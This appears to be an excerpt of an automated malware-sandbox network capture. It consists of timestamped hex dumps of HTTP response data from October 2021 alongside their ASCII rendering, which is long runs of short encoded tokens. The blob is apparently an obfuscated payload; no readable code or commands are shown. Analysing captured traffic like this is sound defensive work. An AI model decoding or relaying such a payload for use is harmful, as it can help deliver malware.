                                                                                                Data Ascii: PO gn TTn TSO TMM Mp gn PT Pi UM TTM OO Min i Pp iU PS iP ni OP TMn nP Ti P iU PS PS TMS Op Oi TTS TMM MP TOp np S Ui TTi TTg TSn UU TSi iO PS iU TMT TTU OU TSM OT iU gU Pn iO TMi TSO TTn TSO TTU Mi gP M Pg Ui pT TTn TSO TTM gi iU PS gO Up TSS MgO MS pp P
                                                                                                2021-10-26 15:35:17 UTC6731INData Raw: 6e 70 20 54 53 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 67 20 54 53 4f 20 54 54 4d 20 50 70 20 67 50 20 50 6e 20 54 69 20 54 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 6e 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 55 20 67 50 20 50 50 20 6e 67 20 67 4f 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 70 20 50 53 20 69 55 20 50 70 20 4d 70 20 55 54 20 6e 69 20 53 20 54 53 4f 20 54 54 4d 20 50 53 20 67 4f 20 54 6e 55 20 70 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 53 55 20 4d 50 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 67 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 70 20 55
                                                                                                Data Ascii: np TS PS Pi US MO ig TSO TTM Pp gP Pn Ti TOU TTi TTn TSO OU Pn Mi TSO Pi Ui TMS TSM TSp TTU gP PP ng gO Ui TTi TTg M Tp PS iU Pp Mp UT ni S TSO TTM PS gO TnU pg Ui TTi TTg nn MSU MP MMi ii gS TnT TTi TTn TSn On Pg nP gP Pi Ui TTU MiO gn TTM PS iO Mp TSp U
                                                                                                2021-10-26 15:35:17 UTC6732INData Raw: 20 50 6e 20 4d 6e 20 54 4f 50 20 70 4f 20 54 4d 53 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 4d 69 20 50 55 20 50 53 20 50 67 20 54 6e 4d 20 69 50 20 50 55 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 54 50 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 69 20 50 70 20 69 55 20 69 4f 20 70 6e 20 69 4d 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 67 20 70 54 20 69 55 20 50 53 20 50 53 20 4f 4d 20 54 54 4d 20 54 54 69 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 54 4d 50 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 50 4d 20 55 67 20 54 53 6e 20 69 50 20 4d 69 6e 20 4f 20 54 55 20 69 55 20 50 53 20 50 50
                                                                                                Data Ascii: Pn Mn TOP pO TMS TTi TTn TSn TMi PU PS Pg TnM iP PU TTn TSO TTg pn TMS PS Pi UP TP TSS TSO TTM Pi Pp iU iO pn iM MgO MS pp PS iU PT nT TSM TTi TTn TSU Tg pT iU PS PS OM TTM TTi TTn iS TpU pU TPg Pi Ui TTP U TMP TTM PS PM PU PM Ug TSn iP Min O TU iU PS PP
                                                                                                2021-10-26 15:35:17 UTC6733INData Raw: 4f 20 54 53 53 20 54 54 4d 20 4d 50 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 69 69 20 67 54 20 67 4f 20 54 54 69 20 55 69 20 54 54 4f 20 54 53 50 20 54 53 67 20 67 54 20 67 67 20 4d 53 20 54 70 20 55 70 20 54 54 4f 20 4f 55 20 70 69 20 4f 6e 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 4f 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 54 70 20 6e 6e 20 70 4d 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 54 67 50 20 54 67 20 70 67 20 69 55 20 50 53 20 50 53 20 54 4d 6e 20 54 50 4d 20 54 54 6e 20 54 4d 70 20 70 69 20 50 4d 20 69 55 20 54 55 54 20 50 69 20 55 69 20 54 54 69 20 4f 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 6e 20 54 70 6e 20 70 70 20 4f 69 20 4f 69 20 6e 50 20 54 54 50 20 54 55 55 20
                                                                                                Data Ascii: O TSS TTM MP iU PS Pi Ui TTi TTn TSO TTi iO ii gT gO TTi Ui TTO TSP TSg gT gg MS Tp Up TTO OU pi On MS MM Mi nP OP TTi TTn TSP OT MTp nn pM Pi Ui TTU Oi TgP Tg pg iU PS PS TMn TPM TTn TMp pi PM iU TUT Pi Ui TTi On TSO TTM gP PS gn Tpn pp Oi Oi nP TTP TUU
                                                                                                2021-10-26 15:35:17 UTC6735INData Raw: 53 4d 20 67 4f 20 4d 4f 20 67 4d 20 54 70 20 69 6e 20 54 53 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 69 50 20 67 70 20 4d 70 20 4f 69 20 55 69 20 4d 70 20 50 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 70 20 54 4d 6e 20 54 50 55 20 55 67 20 6e 53 20 54 67 4d 20 69 4f 20 53 20 50 70 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 70 20 54 53 69 20 55 55 20 54 53 67 20 55 70 20 6e 67 20 69 53 20 50 53 20 50 69 20 55 53 20 4f 50 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 55 20 4d 55 20 55 70 20 54 54 54 20 54 53 50 20 70 69 20 4f 55 20 4d 53 20 6e 50 20 69 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 54 4d 53 20 54 53 70 20 67 54 20 50 55 20 4d 53 20 55 4f 20 70 54
                                                                                                Data Ascii: SM gO MO gM Tp in TSp TTn TSO TTp iO iP gp Mp Oi Ui Mp P TTM PS PU Mi Tp TMn TPU Ug nS TgM iO S Pp Pi TSS TTi TTn TSO TTM PS iU PS PM np TSi UU TSg Up ng iS PS Pi US OP TTP nS TTP MS Mn TOU MU Up TTT TSP pi OU MS nP iM Pi Ui TTU TTU TMS TSp gT PU MS UO pT
                                                                                                2021-10-26 15:35:17 UTC6736INData Raw: 54 50 67 20 4f 53 20 69 55 20 69 4d 20 67 6e 20 4d 6e 20 6e 54 20 55 69 20 54 69 20 54 54 70 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 69 53 20 6e 6e 20 4f 50 20 54 4d 70 20 6e 50 20 54 54 70 20 4f 67 20 4f 50 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 50 50 20 4d 53 20 4d 6e 20 54 4f 67 20 50 69 20 55 69 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 4d 20 50 53 20 4d 67 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 69 67 20 69 67 20 4d 6e 20 4f 69 20 55 69 20 54 69 20 54 54 4f 20 54 54 4d 20 50 53 20 50 4d 20 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 4d 20 69 4d 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 70 20 50 53 20 69 55 20 50 69 20 55 4f
                                                                                                Data Ascii: TPg OS iU iM gn Mn nT Ui Ti TTp TTM PS PM iO iS nn OP TMp nP TTp Og OP PS Pi Oi UU Ug nS TPP MS Mn TOg Pi Ui TTi TTU Og TMM PS Mg PS Pi Ui TTi TTn TSO TTM iU ig ig Mn Oi Ui Ti TTO TTM PS PM gT iU TMn TTg Ug nS TgM Mi PS iM iM TMT TMp Ug MM TSp PS iU Pi UO
                                                                                                2021-10-26 15:35:17 UTC6737INData Raw: 6e 20 54 53 6e 20 54 54 70 20 67 70 20 69 4d 20 69 55 20 6e 6e 20 6e 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 54 20 67 70 20 69 55 20 50 53 20 50 53 20 55 54 20 4f 53 20 54 4f 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 50 53 20 50 69 20 55 69 20 54 54 67 20 70 4f 20 54 53 67 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 69 70 20 69 67 20 67 54 20 69 4f 20 54 54 69 20 4f 53 20 4d 67 50 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 4d 53 20 4d 4f 20 54 70 67 20 54 54 69 20 54 54 54 20 70 4f 20 4d 67 6e 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 50 20 54 54 4d 20 54 70 4f 20 69 55 20 50 53 20 50 69 20 6e 70 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 50 20 54
                                                                                                Data Ascii: n TSn TTp gp iM iU nn nO TTi TTn TSP TT gp iU PS PS UT OS TOi TSO TTM PM Mp PS Pi Ui TTg pO TSg TTM pT iU PS Pi Ui TTi TTn TSO TTP ip ig gT iO TTi OS MgP TSO TTM PM Mp MS MO Tpg TTi TTT pO Mgn PS iU PM MU Ui On pO TSP TTM TpO iU PS Pi np TTi TTn TMi TSP T
                                                                                                2021-10-26 15:35:17 UTC6739INData Raw: 4d 67 55 20 69 70 20 50 55 20 54 4d 6e 20 54 55 4f 20 54 4d 53 20 6e 53 20 54 70 70 20 6e 4f 20 54 55 69 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 70 4f 20 70 4f 20 70 53 20 50 53 20 69 55 20 50 70 20 67 4f 20 55 53 20 54 4d 54 20 4f 67 20 54 4d 20 54 54 4d 20 50 53 20 50 55 20 4d 67 70 20 50 69 20 55 67 20 55 55 20 54 53 4f 20 54 55 4f 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 69 20 55 69 20 54 4d 4d 20 54 54 6e 20 69 53 20 70 54 20 50 53 20 70 67 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 70 20 50 53 20 50 69 20 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 70 6e 20 6e 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4f 67 20 6e 50 20 55 69 20 54 54
                                                                                                Data Ascii: MgU ip PU TMn TUO TMS nS Tpp nO TUi PS Pi US UO TpO pO pS PS iU Pp gO US TMT Og TM TTM PS PU Mgp Pi Ug UU TSO TUO TTg gi iU PS Pi Ui TMM TTn iS pT PS pg TTp Pi Ui TTP TSM Og TTp PS Op PS Pi Ui TSP TTn TSO On iU pn nM Pi Ui TMS TTS pi TMg MS PP Og nP Ui TT
                                                                                                2021-10-26 15:35:17 UTC6740INData Raw: 4d 54 54 20 50 55 20 4d 50 20 4d 54 55 20 70 4f 20 54 54 4f 20 4d 70 20 4d 67 6e 20 54 54 4d 20 50 53 20 50 55 20 50 55 20 4f 4d 20 54 67 20 54 54 70 20 4d 50 54 20 4d 54 55 20 4d 70 20 4d 70 20 6e 54 20 50 53 20 50 69 20 4f 69 20 4d 6e 20 54 53 4d 20 54 53 6e 20 4f 6e 20 50 50 20 50 69 20 50 55 20 67 4f 20 55 4d 20 4d 4f 20 4d 69 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 70 54 20 50 55 20 70 67 20 54 4d 20 54 4d 70 20 54 4d 50 20 54 53 6e 20 4d 50 69 20 54 67 67 20 67 20 4d 67 53 20 67 4f 20 55 54 20 4d 4f 20 54 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 4d 69 20 67 6e 20 54 53 53 20 54 54 4f 20 54 54 6e 20 70 4f 20 54 54 4d 20 50 53 20 69 55 20 69 50 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 54 54 70 20 54 53 69 20 70 50 20 6e 53 20 50 53 20 50 69 20
                                                                                                Data Ascii: MTT PU MP MTU pO TTO Mp Mgn TTM PS PU PU OM Tg TTp MPT MTU Mp Mp nT PS Pi Oi Mn TSM TSn On PP Pi PU gO UM MO Min TSO TTM Pp pT PU pg TM TMp TMP TSn MPi Tgg g MgS gO UT MO TM TSO TTM Pp Pi Mi gn TSS TTO TTn pO TTM PS iU iP Pi Ui OO TTO TTp TSi pP nS PS Pi
                                                                                                2021-10-26 15:35:17 UTC6741INData Raw: 53 20 4d 4f 20 54 6e 67 20 54 54 4d 20 4f 55 20 54 54 4d 20 4f 67 20 50 55 20 4d 4d 20 4f 67 20 54 4d 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 4f 4f 20 4d 53 20 4d 6e 20 54 4f 70 20 50 4d 20 6e 4f 20 54 53 53 20 55 4f 20 54 53 54 20 55 70 20 4f 67 20 4f 70 20 50 53 20 50 69 20 55 4d 20 55 4f 20 54 54 55 20 6e 50 20 4f 54 20 54 4f 70 20 4d 70 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 69 20 54 53 4f 20 4f 54 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 54 20 4d 67 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 54 50 20 4f 50 20 54 54 54 20 54 53 67 20 67 70 20 4d 55 20 67 70 20 54 70 20 54 54 69 20 54 54 4d 20 54 69 20 6e 50 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 50 4d 20 69 6e 20 55 70 20 54 54 6e 20 54
                                                                                                Data Ascii: S MO Tng TTM OU TTM Og PU MM Og TMT Ui TTi TTP nS OO MS Mn TOp PM nO TSS UO TST Up Og Op PS Pi UM UO TTU nP OT TOp Mp PS Pi Un pp TMi TSO OT PS iU PS Pi Ui TTi TTn TTT TT Mg iU PS PS TMS TTP OP TTT TSg gp MU gp Tp TTi TTM Ti nP TTM PS PM gp PM in Up TTn T
                                                                                                2021-10-26 15:35:17 UTC6743INData Raw: 20 54 54 69 20 54 54 6e 20 6e 4f 20 54 54 4d 20 50 53 20 67 67 20 69 55 20 6e 6e 20 54 4d 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 53 50 20 67 54 20 50 6e 20 4d 53 20 69 55 20 54 4d 69 20 4d 50 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 50 20 50 54 20 50 70 20 4d 4f 20 54 70 54 20 54 54 4d 20 54 69 20 70 55 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 55 4f 20 4d 54 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4d 20 4d 4f 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 67 54 20 54 4f 54 20 69 55 20 50 53 20 70 53 20 55 53 20 4f 53 20 67 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4f 6e 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 54 54 20 54 6e 69 20 54 54 67 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20
                                                                                                Data Ascii: TTi TTn nO TTM PS gg iU nn TMP TTi TTn TSP TSP gT Pn MS iU TMi MPT TTn TSO TMM MP PT Pp MO TpT TTM Ti pU TTM PS PM iO UO MTp TTi TTn TSg OM MO PS ng gT Ui TTi TTg TTS gT TOT iU PS pS US OS gO TSO TTM Pp OP On Pi Ui TMS UO TTT Tni TTg PS ng gT Ui TTi TTg
                                                                                                2021-10-26 15:35:17 UTC6744INData Raw: 54 70 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 4d 20 4f 67 20 50 4d 20 4d 4d 20 4d 50 20 54 4d 20 55 55 20 55 4f 20 54 50 67 20 54 53 4d 20 4f 54 20 4d 53 4d 20 50 70 20 67 4d 20 69 55 20 6e 53 20 54 54 50 20 4f 67 20 4d 50 69 20 54 54 4d 20 50 53 20 50 55 20 67 67 20 50 53 20 6e 53 20 54 54 55 20 4f 67 20 4d 69 4f 20 54 54 4d 20 50 53 20 50 55 20 67 4d 20 50 50 20 54 4d 69 20 4d 4d 50 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 67 20 50 67 20 67 4d 20 50 54 20 54 4d 69 20 4d 67 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4f 53 20 4d 4d 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 67 67 20 50 4d 20 55 4f 20 54 4f 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 55 20 50 54 20 4d 69 20 54 6e 53 20 50 69 20 55 69 20 54 4d
                                                                                                Data Ascii: Tpi Ui TTi TMn TTM Og PM MM MP TM UU UO TPg TSM OT MSM Pp gM iU nS TTP Og MPi TTM PS PU gg PS nS TTU Og MiO TTM PS PU gM PP TMi MMP TTn TSO TMM gg Pg gM PT TMi MgT TTn TSO TMM Mp OU PS Pi Oi OS MMn TSO TTM Pp gg PM UO TOP TTi TTn TSg OU PT Mi TnS Pi Ui TM
                                                                                                2021-10-26 15:35:17 UTC6745INData Raw: 6e 67 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 6e 55 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 54 50 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 55 4d 20 55 69 20 54 54 69 20 54 54 50 20 54 4f 20 6e 54 20 50 53 20 69 55 20 50 69 20 4d 70 20 4f 69 20 4f 53 20 54 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 55 69 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 4d 69 53 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 54 53 50 20 55 69 20 54 54 69 20 54 54 50 20 70 4f 20 4d 50 53 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 70 69 20 50 69 20 69 55 20 6e 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 20 54 55 67 20 50 69 20 55 69 20 54 54 70 20
                                                                                                Data Ascii: ng PS Pi UM OS Ti TSO TTM PM Mi nU Pi Ui TTp Og TP TTM PS Pi Mp UM Ui TTi TTP TO nT PS iU Pi Mp Oi OS TU TSO TTM PM Mi Ui Pi Ui TTp Og MiS TTM PS Pi Mp TSP Ui TTi TTP pO MPS PS iU PM MU Ui TTi TTn TTS pi Pi iU nn Pi Ui TTi TTn TSO TTM PS Mi TUg Pi Ui TTp
                                                                                                2021-10-26 15:35:17 UTC6747INData Raw: 50 20 54 6e 20 4d 53 50 20 4d 53 6e 20 4d 53 50 20 50 69 20 6e 4f 20 70 70 20 54 54 67 20 54 53 4f 20 67 20 50 53 20 69 55 20 50 53 20 54 6e 20 55 69 20 54 54 69 20 54 53 53 20 6e 6e 20 67 69 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 67 50 20 69 55 20 50 53 20 69 55 20 69 4d 20 70 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 70 4d 20 50 53 20 50 69 20 4f 69 20 54 53 70 20 55 55 20 54 54 53 20 55 70 20 4d 50 20 54 53 20 50 6e 20 4d 4f 20 54 6e 50 20 4f 70 20 54 54 70 20 70 4f 20 4d 4d 6e 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 55 55 20 55 67 20 6e 6e 20 4d 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 55 20 50 53 20 4d 69 20 54 70
                                                                                                Data Ascii: P Tn MSP MSn MSP Pi nO pp TTg TSO g PS iU PS Tn Ui TTi TSS nn gi TU MMi ii gS TnT TTi TTn TSn UU TgP iU PS iU iM pi TTn TSO TTp Og TpM PS Pi Oi TSp UU TTS Up MP TS Pn MO TnP Op TTp pO MMn PS iU Pp ii TMT UU Ug nn M TU MMi ii gS TnT TTi TTn TSn OU PS Mi Tp
                                                                                                2021-10-26 15:35:17 UTC6748INData Raw: 20 4d 53 4f 20 4d 67 70 20 70 20 6e 53 20 54 4d 54 20 54 67 4f 20 54 4d 67 20 54 53 69 20 50 53 20 69 55 20 69 54 20 55 4f 20 50 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 54 70 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 4d 20 70 69 20 55 4d 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 6e 20 6e 54 20 54 53 67 20 67 6e 20 69 4f 20 4d 70 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 4f 20 54 54 4d 20 54 54 4d 20 4d 69 53 20 50 53 20 50 70 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 50 53 20 4d 50 69 20 50
                                                                                                Data Ascii: MSO Mgp p nS TMT TgO TMg TSi PS iU iT UO PP TTi TTn TSg TnM Mgp Tp Mg gS Mi TTi TTn TSg OO Pg gg Pg MM pi UM TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS Pi Oi TnM TTn nT TSg gn iO Mp Pi Ui TTM TTn TO TTM TTM MiS PS Pp Ui TTi TTn TSO TTi PS MPi P
                                                                                                2021-10-26 15:35:17 UTC6749INData Raw: 4d 69 4d 20 70 70 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 55 20 50 20 50 69 20 55 69 20 54 54 55 20 4f 67 20 54 67 20 54 54 67 20 50 53 20 50 69 20 54 6e 55 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 54 6e 20 54 4d 54 20 54 55 55 20 54 67 50 20 67 6e 20 54 54 54 20 6e 54 20 54 54 6e 20 54 53 4d 20 54 53 50 20 6e 4d 20 4d 54 70 20 69 55 20 50 53 20 50 69 20 6e 53 20 54 54 4f 20 54 67 4f 20 54 4d 53 20 4f 70 20 50 53 20 69 55 20 69 55 20 67 70 20 55 54 20 54 4d 67 20 54 53 53 20 54 53 50 20 4d 67 69 20 6e 50 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 67 20 70 54 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 69 50 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 69 20 54 4d 54 20 67 50 20 50 4d 20 67 6e 20 54 54 53 20 4d 53 70 20 54 54 20 6e 54 20 54 53 4f
                                                                                                Data Ascii: MiM pp TSO TTM Pi nU P Pi Ui TTU Og Tg TTg PS Pi TnU S Ui TTi TTg TTn TMT TUU TgP gn TTT nT TTn TSM TSP nM MTp iU PS Pi nS TTO TgO TMS Op PS iU iU gp UT TMg TSS TSP Mgi nP TMS PS Pi UP g pT TSO TTM PT nn iP Pi Ui TTU TSg TSi TMT gP PM gn TTS MSp TT nT TSO
                                                                                                2021-10-26 15:35:17 UTC6751INData Raw: 6e 20 54 53 67 20 54 4d 53 20 6e 70 20 6e 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 6e 20 69 4f 20 50 55 20 54 4d 6e 20 54 69 70 20 54 54 20 55 6e 20 54 54 4d 20 50 53 20 50 4d 20 4f 67 20 54 53 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 4d 67 20 4f 4d 20 69 4f 20 4d 4d 20 4d 50 20 54 53 4d 20 6e 54 20 54 54 4f 20 4f 69 20 54 50 54 20 4f 55 20 50 50 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 4d 53 20 54 53 53 20 54 54 20 67 4d 20 69 55 20 50 53 20 50 53 20 54 4d 54 20 54 54 4d 20 4f 69 20 55 6e 20 54 4d 53 20 50 4f 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 54 20 54 4d 54 20 6e 67 20
                                                                                                Data Ascii: n TSg TMS np n PS Pi US MO ip TSO TTM Pp Mn iO PU TMn Tip TT Un TTM PS PM Og TSi Ui TTi TMn TMg OM iO MM MP TSM nT TTO Oi TPT OU PP Mi TSO Pi Ui TMS TMS TSS TT gM iU PS PS TMT TTM Oi Un TMS PO nP gP Pi Ui TTU MiO gn TTM PS iO Og TSO Ui TTi TMn TST TMT ng
                                                                                                2021-10-26 15:35:17 UTC6752INData Raw: 20 54 54 67 20 54 53 54 20 4f 55 20 50 53 20 6e 50 20 54 70 20 50 69 20 55 69 20 54 54 55 20 55 20 54 4d 70 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 67 70 20 55 69 20 4f 20 55 69 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 6e 20 67 55 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 4f 20 54 54 20 54 70 20 69 55 20 50 53 20 50 53 20 4f 4d 20 4f 53 20 4f 54 20 54 53 55 20 54 54 4d 20 50 4d 20 4d 6e 20 50 4d 20 70 54 20 54 4d 6e 20 4d 53 55 20 54 4d 6e 20 6e 53 20 4d 54 55 20 67 4d 20 50 54 20 4d 70 20 54 67 67 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 4d 50 54 20 4d 67 70 20 70 4d 20 67 4d 20 50 67 20 54 6e 53 20 54 53 53 20 4f 4f 20 54 53 4f 20 54 54 4d 20 69 54 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 53 20 54 70 4f 20 54 4f 20 4f 4d 20 50 53 20 69
                                                                                                Data Ascii: TTg TST OU PS nP Tp Pi Ui TTU U TMp TTM PS PM PU gp Ui O Ui TSO TTM Pi nn gU Pi Ui TTU TSg TSO TT Tp iU PS PS OM OS OT TSU TTM PM Mn PM pT TMn MSU TMn nS MTU gM PT Mp Tgg Ui TTi TMn pi MPT Mgp pM gM Pg TnS TSS OO TSO TTM iT OP UT Pi Ui TMS TpO TO OM PS i
                                                                                                2021-10-26 15:35:17 UTC6753INData Raw: 50 20 4d 67 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 6e 6e 20 55 69 20 54 54 69 20 54 54 67 20 4d 4d 50 20 55 53 20 50 53 20 69 55 20 50 54 20 55 4f 20 54 4d 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 4f 20 69 55 20 50 53 20 50 53 20 54 54 70 20 69 20 55 69 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 54 4d 20 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 54 55 55 20 54 55 20 50 69 20 55 69 20 54 54 50 20 4d 70 20 50 67 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 54 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 4f 20 54 4f 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 6e 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 69 4d 20 54 54 6e 20 54
                                                                                                Data Ascii: P Mg TgM TSU Og Tip TTM PS Pi np nn Ui TTi TTg MMP US PS iU PT UO TM TTi TTn TSn Ti O iU PS PS TTp i Ui TUO TTS Mp MSn PS Pi UM TM O TSO TTM Pi TUU TU Pi Ui TTP Mp Pg TTM PS Pi np Tg Ui TTi TTg nn MO TO MMi ii gS TnT TTi TTn TSn Ti nO iU PS PS PO iM TTn T
                                                                                                2021-10-26 15:35:17 UTC6755INData Raw: 67 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 69 20 50 53 20 4d 70 20 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 53 20 4f 4f 20 55 6e 20 50 69 20 6e 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 67 67 20 53 20 50 4d 20 50 69 20 55 50 20 54 54 50 20 54 54 6e 20 54 53 4f 20 4f 69 20 50 53 20 69 55 20 67 50 20 67 53 20 50 55 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 67 53 20 50 6e 20 4d 53 20 69 4f 20 54 53 4f 20 54 67 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 54 20 54 54 6e 20 70 20 54 6e 53 20 54 54 4d 20 50 53 20 50 55 20 69 67 20 54 4d 20 54 67 67 20 54 54 69 20 54 54 6e 20 54 53 4f 20 55 70 20 67 50 20 50 67 20 70 50 20 4d 50 69 20 55 69 20 54 54 69 20 54 4d 6e 